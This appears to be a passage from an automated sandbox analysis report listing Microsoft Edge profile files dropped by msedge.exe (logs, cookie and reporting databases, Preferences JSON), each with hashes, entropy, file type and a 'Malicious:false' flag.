                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kmZSVvBYeb8rcHEZrELFUt8/mZSg/+/mYSI56Yeb8rcHEZrEZSJ:kf5BYeb8nZrExg8/fNtSS6Yeb8nZrEZe
                                                                                                                                                                                                                                                                                                                  MD5:77E4DD6A4CB404C18E8AD6E603604EC2
                                                                                                                                                                                                                                                                                                                  SHA1:0F50257B19C3C8E9D2F3972D1B9DFC785FAEB118
                                                                                                                                                                                                                                                                                                                  SHA-256:CD3355062C0FD8B511BD83CF201F7DE2883B812D786B3D633E60C071015BC01C
                                                                                                                                                                                                                                                                                                                  SHA-512:493E934E1E8EC0EE2C8F893B1FECCCF1508398390F1F8D4CA011D70A04E82FB315E6ECAA2B3DB427B71BF179FBA80977F92818E7B41BB8AFA6CB83A36CB0AC0D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:32.346 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-09:48:32.346 d34 Recovering log #3.2024/11/21-09:48:32.347 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):405
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.31260602196323
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:12:kmZSVvBYeb8rcHEZrELFUt8/mZSg/+/mYSI56Yeb8rcHEZrEZSJ:kf5BYeb8nZrExg8/fNtSS6Yeb8nZrEZe
                                                                                                                                                                                                                                                                                                                  MD5:77E4DD6A4CB404C18E8AD6E603604EC2
                                                                                                                                                                                                                                                                                                                  SHA1:0F50257B19C3C8E9D2F3972D1B9DFC785FAEB118
                                                                                                                                                                                                                                                                                                                  SHA-256:CD3355062C0FD8B511BD83CF201F7DE2883B812D786B3D633E60C071015BC01C
                                                                                                                                                                                                                                                                                                                  SHA-512:493E934E1E8EC0EE2C8F893B1FECCCF1508398390F1F8D4CA011D70A04E82FB315E6ECAA2B3DB427B71BF179FBA80977F92818E7B41BB8AFA6CB83A36CB0AC0D
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:32.346 d34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/21-09:48:32.346 d34 Recovering log #3.2024/11/21-09:48:32.347 d34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.20511841044185
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HELQDM+q2PCHhJ23oH+Tcwt8a2jMGIFUt8YELcgZmw+YELuJUGSDMVkwOCHhJ234:kh+vBYeb8EFUt8/h/+/qJUG3V56Yeb8N
                                                                                                                                                                                                                                                                                                                  MD5:1C6747946B6ADD36775EFCA1964A5A67
                                                                                                                                                                                                                                                                                                                  SHA1:8AFFECA70EFCAB095BC3ECA00C9EC9A899CA0F26
                                                                                                                                                                                                                                                                                                                  SHA-256:8D011C6B9E73A36E80C7C20F50DE078D66F9114BB28759C5269D1EC01419ABC6
                                                                                                                                                                                                                                                                                                                  SHA-512:539059467BB4B88EF5415FFC3BD4006FBB67291849D465BBA83C4293C1EAF17E829C84CB7846E5CF0EFCD42383FCA689599968D7268003ADAA7D9F963957B216
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.735 1c1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-09:48:29.739 1c1c Recovering log #3.2024/11/21-09:48:29.778 1c1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):336
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.20511841044185
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:HELQDM+q2PCHhJ23oH+Tcwt8a2jMGIFUt8YELcgZmw+YELuJUGSDMVkwOCHhJ234:kh+vBYeb8EFUt8/h/+/qJUG3V56Yeb8N
                                                                                                                                                                                                                                                                                                                  MD5:1C6747946B6ADD36775EFCA1964A5A67
                                                                                                                                                                                                                                                                                                                  SHA1:8AFFECA70EFCAB095BC3ECA00C9EC9A899CA0F26
                                                                                                                                                                                                                                                                                                                  SHA-256:8D011C6B9E73A36E80C7C20F50DE078D66F9114BB28759C5269D1EC01419ABC6
                                                                                                                                                                                                                                                                                                                  SHA-512:539059467BB4B88EF5415FFC3BD4006FBB67291849D465BBA83C4293C1EAF17E829C84CB7846E5CF0EFCD42383FCA689599968D7268003ADAA7D9F963957B216
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2024/11/21-09:48:29.735 1c1c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/21-09:48:29.739 1c1c Recovering log #3.2024/11/21-09:48:29.778 1c1c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\20975aff-ea7d-4ca4-9d11-52096d5cae27.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.3522035045933645
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:TsKLopF+SawLUO1Xj8BLfWKgh8pwZEX0hpR71FX08:te+AuLpgh8fXoD7fX08
                                                                                                                                                                                                                                                                                                                  MD5:9D7BA9A2E4D5DC3E60D4DFBECD1E93B0
                                                                                                                                                                                                                                                                                                                  SHA1:7ADF0EDCEBBA39AE55F093A86E846EB10C94546E
                                                                                                                                                                                                                                                                                                                  SHA-256:167ADE8A21D0153BF1EB66FDDEE14AF92A28A73D50D7E87FE7F8BFA3070B5590
                                                                                                                                                                                                                                                                                                                  SHA-512:B4B35D981AF73C9CDDC0260E3D05F48559E457D465D05D89795E1AA5A98D0BCCC06302F388CF17BC2C6E8FEA234745D78DA1319DFE994ADE781DF47779ACEE21
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.4416238738239526
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB4T+:uIEumQv8m1ccnvS6wF/mTpezt4s1a
                                                                                                                                                                                                                                                                                                                  MD5:2D2CA6B046183BE602AC1124766065F5
                                                                                                                                                                                                                                                                                                                  SHA1:77366051BA87ABB2B78039C8AAAB9C1459BA7F8E
                                                                                                                                                                                                                                                                                                                  SHA-256:1A1DBB247B7A9BE4E40783D68A272AC1DB374DDF2E1844E3E7BAC8CD4353F6D4
                                                                                                                                                                                                                                                                                                                  SHA-512:DF7FB18068034389B6A218E40957780DAE28D29B6991A52710DD50C0D77536A3C192D6FA6D1AB3B2D54CBF66C6FA48BD45E993136DF43286EF42190F97650E13
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF37f24.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3ccf6.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\c0f04066-c8ef-477c-8caa-88c8328c2de2.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f7556e90-bf66-4a4f-be71-bddcf84d02f7.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ff7cc0d3-7720-437b-ba7e-7dc8d3dc3bb0.tmp

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                  MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                  SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                  SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                  SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9495
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.11335896144518
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQkdpmV7sb9FIa34HkpRb85nbV+FbwQA4kq7NIyPZYJ:stQQmpsb9FXgbGcQxX7NI5
                                                                                                                                                                                                                                                                                                                  MD5:E0D53DF8F5941B19691694C9E1DEE993
                                                                                                                                                                                                                                                                                                                  SHA1:6474CFCBFB97ADCF2D05F5978EA4F9A4A160BF15
                                                                                                                                                                                                                                                                                                                  SHA-256:42DE68201D6864F13E006466A0E69BDCD0252C1F1700723A146CC42D9AB0F0DB
                                                                                                                                                                                                                                                                                                                  SHA-512:C939FAA0BD1D6E36C12C68BDEA72E886DC33DF17CB3E604ED96E8D7596E804203FF47DFA96A2346CBC44355EB1A1611BC7011AB63C64A6D41CDDD6163CF706D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3c16d.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9495
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.11335896144518
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQkdpmV7sb9FIa34HkpRb85nbV+FbwQA4kq7NIyPZYJ:stQQmpsb9FXgbGcQxX7NI5
                                                                                                                                                                                                                                                                                                                  MD5:E0D53DF8F5941B19691694C9E1DEE993
                                                                                                                                                                                                                                                                                                                  SHA1:6474CFCBFB97ADCF2D05F5978EA4F9A4A160BF15
                                                                                                                                                                                                                                                                                                                  SHA-256:42DE68201D6864F13E006466A0E69BDCD0252C1F1700723A146CC42D9AB0F0DB
                                                                                                                                                                                                                                                                                                                  SHA-512:C939FAA0BD1D6E36C12C68BDEA72E886DC33DF17CB3E604ED96E8D7596E804203FF47DFA96A2346CBC44355EB1A1611BC7011AB63C64A6D41CDDD6163CF706D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376674109197488","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co

                                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF40442.TMP (copy)

                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9495
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.11335896144518
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:192:stQkdpmV7sb9FIa34HkpRb85nbV+FbwQA4kq7NIyPZYJ:stQQmpsb9FXgbGcQxX7NI5
                                                                                                                                                                                                                                                                                                                  MD5:E0D53DF8F5941B19691694C9E1DEE993
                                                                                                                                                                                                                                                                                                                  SHA1:6474CFCBFB97ADCF2D05F5978EA4F9A4A160BF15
                                                                                                                                                                                                                                                                                                                  SHA-256:42DE68201D6864F13E006466A0E69BDCD0252C1F1700723A146CC42D9AB0F0DB
                                                                                                                                                                                                                                                                                                                  SHA-512:C939FAA0BD1D6E36C12C68BDEA72E886DC33DF17CB3E604ED96E8D7596E804203FF47DFA96A2346CBC44355EB1A1611BC7011AB63C64A6D41CDDD6163CF706D3
                                                                                                                                                                                                                                                                                                                  Malicious:false
